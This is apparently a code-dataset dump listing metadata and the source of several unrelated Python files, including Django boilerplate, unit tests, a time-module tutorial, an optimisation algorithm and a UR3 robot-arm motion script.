blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2277163fb77406568bbbbfd4c43fbc3d8f8704ff | 583db8851c609f03f722884557cfc67de0ce564e | /pysmapi/interfaces/Event_Stream_Add.py | 8592834aefd487a4a877f75155c9b4f73ace2267 | [
"Apache-2.0"
] | permissive | lllucius/pysmapi | ab0b4409bfda6a61dab7805e2033d71d09a96493 | c0d802edb58e835e4d48cb9c28ccfccfe5b5c686 | refs/heads/master | 2020-04-20T18:07:46.699611 | 2019-06-25T04:27:41 | 2019-06-25T04:27:41 | 169,009,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py |
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
from pysmapi.smapi import *
class Event_Stream_Add(Request):
def __init__(self,
event_info = "",
**kwargs):
super(Event_Stream_Add, self).__init__(**kwargs)
# Request parameters
self._event_info = event_info
@property
def event_info(self):
return self._event_info
@event_info.setter
def event_info(self, value):
self._event_info = value
def pack(self, **kwargs):
# event_info (string,1-maxlength,charNA)
buf = s2b(self._event_info)
return buf
| [
"[email protected]"
] | |
173d992267a4c50b4df509c54add6f9396d75fbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02821/s313302941.py | 271131d42505bd3b94253e5c4d6e944e2905ed13 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
n = len(s)
cs = [0] * (n+1)
for i in range(n):
cs[i+1] = cs[i] + s[i]
return cs
def bs_list(a, f):
l, r = -1, len(a)
while r - l > 1:
x = (l + r) // 2
if f(a[x]): r = x
else: l = x
return None if r == len(a) else r
a.sort()
ca = cumsum(a)
def detect(x):
num = 0
for b in a[::-1]:
res = bs_list(a, lambda y: y >= x - b)
if res is None: break
num += n - res
return num <= m
l, r = -1, 10**5*2+10
while r - l > 1:
x = (l+r) // 2
if detect(x): r = x
else: l = x
s, c = 0, 0
for b in a[::-1]:
res = bs_list(a, lambda x: x >= r - b)
if res is None: break
c += (n - res)
s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
| [
"[email protected]"
] | |
48029ad550be99084bdc75771e75b28299f992dd | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/28_1.py | 8bba51f3b7f6bc07e66c3cce6c8bb5320e828687 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python has defined a module, “time” which allows us to handle various
operations regarding time, its conversions and representations, which find its
use in various applications in life. The beginning of time is started
measuring from **1 January, 12:00 am, 1970** and this very time is termed as “
**epoch** ” in Python.
**Operations on Time :**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**
each representing a time attribute in sequence. It converts **seconds into
time attributes(days, years, months etc.)** till specified seconds from epoch.
If no seconds are mentioned, time is calculated till present. The structure
attribute table is given below.
Index Attributes Values
0 tm_year 2008
1 tm_mon 1 to 12
2 tm_mday 1 to 31
3 tm_hour 0 to 23
4 tm_min 0 to 59
5 tm_sec 0 to 61 (60 or 61 are leap-seconds)
6 tm_wday 0 to 6
7 tm_yday 1 to 366
8 tm_isdst -1, 0, 1 where -1 means
Library determines DST
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
---
__
__
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
**3\. asctime(“time”)** :- This function takes a time attributed string
produced by gmtime() and returns a **24 character string denoting time**.
**4\. ctime(sec)** :- This function returns a **24 character time string** but
takes seconds as argument and **computes time till mentioned seconds**. If no
argument is passed, time is calculated till present.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to diplay time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
---
__
__
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **hault the program execution**
for the time specified in the arguments.
__
__
__
__
__
__
__
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to hault execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
---
__
__
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**. If you like GeeksforGeeks
and would like to contribute, you can also write an article using
contribute.geeksforgeeks.org or mail your article to
[email protected]. See your article appearing on the GeeksforGeeks
main page and help other Geeks.
Please write comments if you find anything incorrect, or you want to share
more information about the topic discussed above.
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"[email protected]"
] | |
0171b167d839283f68195e743403d47603fa9f35 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_004/ch15_2019_03_15_12_37_22_879295.py | 63ff08a3f9db6f997d4660dad3874728fbdd779e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | import math
def volume_da_pizza(z, a):
v=(math.pi*(z**2))*a
return v
| [
"[email protected]"
] | |
45ea3e7d8004d23bd4b5fe78a403b5515a80826a | 42000e14d25ce3de5b9ba24e3399e67bf88c4ad1 | /Level_Three/ProTwo/AppTwo/migrations/0001_initial.py | db9703f5f9d755c7f363b452bdc1ccaea87e2c26 | [] | no_license | cdunn6754/Django_Projects | 0528b3263e2762d0e872686ec5f00a40f3730851 | 545d4e73f05969d1277cacaab2042787676b7e73 | refs/heads/master | 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=264)),
('last_name', models.CharField(max_length=264)),
('email', models.EmailField(max_length=264)),
],
),
]
| [
"[email protected]"
] | |
ff5481487e54507a28f7f346fc73b088e009771b | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0006-ZigZag-Conversion/soln.py | f2d94cda1de538a16f8a63dbbbb03073bd1a954e | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 510 | py | import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows)) | [
"[email protected]"
] | |
ae6dccb3f41dacf3ab006321ca502a67ca354237 | 15ab83191e9aeb58433d578582d8c24ecd68bbaf | /backend/manage.py | 7ecd4a62b90eeb57c918b2b0eab5d8f0c9e39ac1 | [] | no_license | crowdbotics-apps/ecommerce-27317 | 6b36638113b5e64c537ef3e1e674132dd4c21bae | 1f2e00366e112aa3acf74362fba31af42c5589c1 | refs/heads/master | 2023-05-01T22:50:02.897152 | 2021-05-24T11:58:30 | 2021-05-24T11:58:30 | 370,334,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommerce_27317.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38 | b87b4f2ad90390e6dcb53f258077ea6fea574f6c | /tests/test_models/test_user_model.py | 86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee | [] | no_license | Wassally/backend | 1b73510ee451d433c1f747be5356c4e11b6e914a | 01071eb94ecfc3a3b260ae957a0aa638271c66b1 | refs/heads/master | 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 | Python | UTF-8 | Python | false | false | 805 | py | from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
def test_creation_client(self):
client = ClientFactory()
self.assertTrue(isinstance(client, User))
self.assertEqual(
client.__str__(),
"%d: %s" % (client.id, client.username)
)
self.assertTrue(client.is_client)
self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
def test_creation_captain(self):
captain = CaptainFactory()
self.assertTrue(isinstance(captain, Captain))
self.assertEqual(captain.__str__(), captain.user.username)
self.assertTrue(captain.user.is_captain)
self.assertFalse(captain.user.is_client)
| [
"[email protected]"
] | |
b036d6fd8e95f539ae982a23cf985148ad491aca | bcabce262e54a6ac38948a4717254cdc3ce65874 | /mealpy/physics_based/WDO.py | 3e376916b7ec257ba7469ad4a3260e10a7cdabce | [
"MIT"
] | permissive | ibrahim85/MEta-heuristics-ALgorithms-in-PYthon | 4ab6e6ef54127b6f4721178a1f855d1be91f9b42 | 47fb428e8378fc52cd5fe6eff20cec1c68ba5039 | refs/heads/master | 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: [email protected] %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
"""
The original version of : Wind Driven Optimization (WDO)
The Wind Driven Optimization Technique and its Application in Electromagnetics
Link:
https://ieeexplore.ieee.org/abstract/document/6407788
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.RT = RT # RT coefficient
self.g = g # gravitational constant
self.alp = alp # constants in the update equation
self.c = c # coriolis effect
self.max_v = max_v # maximum allowed speed
def train(self):
"""
# pop is the set of "air parcel" - "position"
# air parcel: is the set of gas atoms . Each atom represents a dimension in position and has its own velocity
# pressure represented by fitness value
"""
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
for epoch in range(self.epoch):
# Update velocity based on random dimensions and position of global best
for i in range(self.pop_size):
rand_dim = randint(0, self.problem_size)
temp = list_velocity[i][rand_dim] * ones(self.problem_size)
vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
(1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
vel = clip(vel, -self.max_v, self.max_v)
# Update air parcel positions, check the bound and calculate pressure (fitness)
pos = pop[i][self.ID_POS] + vel
pos = self.amend_position_faster(pos)
fit = self.get_fitness_position(pos)
pop[i] = [pos, fit]
list_velocity[i] = vel
## batch size idea
if self.batch_idea:
if (i + 1) % self.batch_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
else:
if (i + 1) % self.pop_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| [
"[email protected]"
] | |
4ad8ad1fbd7235c212a139cdeafe67ce534debf4 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py | 6388a09a0a8e38670a88995180d3619b60830e60 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,018 | py | # structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
| [
"[email protected]"
] | |
b7cd7a5240afedad530791addc956ba6291b5595 | 54b31b705d88e21bc0b23aabe1df15ca13a07de2 | /bayespy/inference/vmp/nodes/tests/test_concatenate.py | 26d7882980d98f8e8baf3e70236fbf7d7c701405 | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"AFL-3.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bayespy/bayespy | 307ef4c51d511e14d4693cce9929dda37124d11d | 5fe58f7160ebc3a9df7f9e96e50d2bd47837794a | refs/heads/develop | 2023-08-18T21:35:27.744022 | 2023-05-25T08:16:36 | 2023-05-25T08:16:36 | 5,568,322 | 655 | 164 | MIT | 2023-08-15T09:31:55 | 2012-08-27T08:10:20 | Python | UTF-8 | Python | false | false | 10,082 | py | ################################################################################
# Copyright (C) 2015 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for `concatenate` module.
"""
import warnings
import numpy as np
from bayespy.nodes import (Concatenate,
GaussianARD,
Gamma)
from bayespy.utils import random
from bayespy.utils.misc import TestCase
class TestConcatenate(TestCase):
"""
Unit tests for Concatenate node.
"""
def test_init(self):
"""
Test the creation of Concatenate node
"""
# One parent only
X = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (), () ))
X = GaussianARD(0, 1, plates=(3,), shape=(2,4))
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (2,4), (2,4,2,4) ))
# Two parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Two parents with shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (4,6), (4,6,4,6) ))
# Two parents with non-default axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
self.assertEqual(Y.plates, (5,4))
self.assertEqual(Y.dims, ( (), () ))
# Three parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
X3 = GaussianARD(0, 1, plates=(4,), shape=())
Y = Concatenate(X1, X2, X3)
self.assertEqual(Y.plates, (9,))
self.assertEqual(Y.dims, ( (), () ))
# Constant parent
X1 = [7.2, 3.5]
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Different moments
X1 = GaussianARD(0, 1, plates=(3,))
X2 = Gamma(1, 1, plates=(4,))
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible shapes
X1 = GaussianARD(0, 1, plates=(3,), shape=(2,))
X2 = GaussianARD(0, 1, plates=(2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible plates
X1 = GaussianARD(0, 1, plates=(4,3), shape=())
X2 = GaussianARD(0, 1, plates=(5,2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
pass
def test_message_to_child(self):
"""
Test the message to child of Concatenate node.
"""
var = lambda plates, shape: GaussianARD(
np.random.randn(*(plates + shape)),
np.random.rand(*(plates + shape)),
plates=plates,
shape=shape
)
# Two parents without shapes
X1 = var((2,), ())
X2 = var((3,), ())
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,)))[:2],
u1[0]*np.ones((2,)))
self.assertAllClose((u[1]*np.ones((5,)))[:2],
u1[1]*np.ones((2,)))
self.assertAllClose((u[0]*np.ones((5,)))[2:],
u2[0]*np.ones((3,)))
self.assertAllClose((u[1]*np.ones((5,)))[2:],
u2[1]*np.ones((3,)))
# Two parents with shapes
X1 = var((2,), (4,))
X2 = var((3,), (4,))
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
# Test with non-constant axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[:2],
u1[1]*np.ones((2,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[2:],
u2[1]*np.ones((3,4)))
# Test with constant parent
X1 = np.random.randn(2, 4)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,))
Y = Concatenate(X1, X2)
u1 = Y.parents[0].get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
pass
def test_message_to_parent(self):
"""
Test the message to parents of Concatenate node.
"""
# Two parents without shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,)))[:2],
m1[0]*np.ones((2,)))
self.assertAllClose((m[1]*np.ones((5,)))[:2],
m1[1]*np.ones((2,)))
self.assertAllClose((m[0]*np.ones((5,)))[2:],
m2[0]*np.ones((3,)))
self.assertAllClose((m[1]*np.ones((5,)))[2:],
m2[1]*np.ones((3,)))
# Two parents with shapes
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
# Two parents with non-default concatenation axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Z = Concatenate(X1, X2, axis=-2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4)))[:2],
m1[0]*np.ones((2,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[:2],
m1[1]*np.ones((2,4)))
self.assertAllClose((m[0]*np.ones((5,4)))[2:],
m2[0]*np.ones((3,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[2:],
m2[1]*np.ones((3,4)))
# Constant parent
X1 = np.random.randn(2,4,6)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = Z._message_to_parent(0)
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
pass
def test_mask_to_parent(self):
"""
Test the mask handling in Concatenate node
"""
pass
| [
"[email protected]"
] | |
ee93303355c66a20ff5ffdd32b3ebf107b00bc0e | f5f7a1ae04a999f3f193cca647397b29806edf73 | /0000_examples/ur3_dual_interpolation_exe.py | 09b091f802f3706ab9fd2e03f1068f6f58440932 | [
"MIT"
] | permissive | kazuki0824/wrs | bf88d1568f591c61870332436bfcd079d78b87d7 | 03c9e59779a30e2f6dedf2732ad8a46e6ac3c9f0 | refs/heads/main | 2023-07-24T05:20:02.054592 | 2021-05-31T14:38:18 | 2021-05-31T14:38:18 | 368,829,423 | 1 | 0 | MIT | 2021-05-19T10:25:48 | 2021-05-19T10:25:47 | null | UTF-8 | Python | false | false | 1,191 | py | import math
import numpy as np
import robot_con.ur.ur3_dual_x as u3r85dx
rbtx = u3r85dx.UR3DualX(lft_robot_ip='10.2.0.50', rgt_robot_ip='10.2.0.51', pc_ip='10.2.0.101')
# left randomization
current_lft_jnt_values = rbtx.lft_arm_hnd.get_jnt_values()
n_lft_jnt_values = (current_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_lft_jnt_values = (n_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_lft_jnt_values = (nn_lft_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
# right randomization
current_rgt_jnt_values = rbtx.rgt_arm_hnd.get_jnt_values()
n_rgt_jnt_values = (current_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nn_rgt_jnt_values = (n_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
nnn_rgt_jnt_values = (nn_rgt_jnt_values + (np.random.rand(6) - .5) * 1 / 12 * math.pi).tolist()
rbtx.move_jspace_path([current_lft_jnt_values + current_rgt_jnt_values,
n_lft_jnt_values + n_rgt_jnt_values,
nn_lft_jnt_values + nn_rgt_jnt_values,
nnn_lft_jnt_values + nnn_rgt_jnt_values], control_frequency=0.05) | [
"[email protected]"
] | |
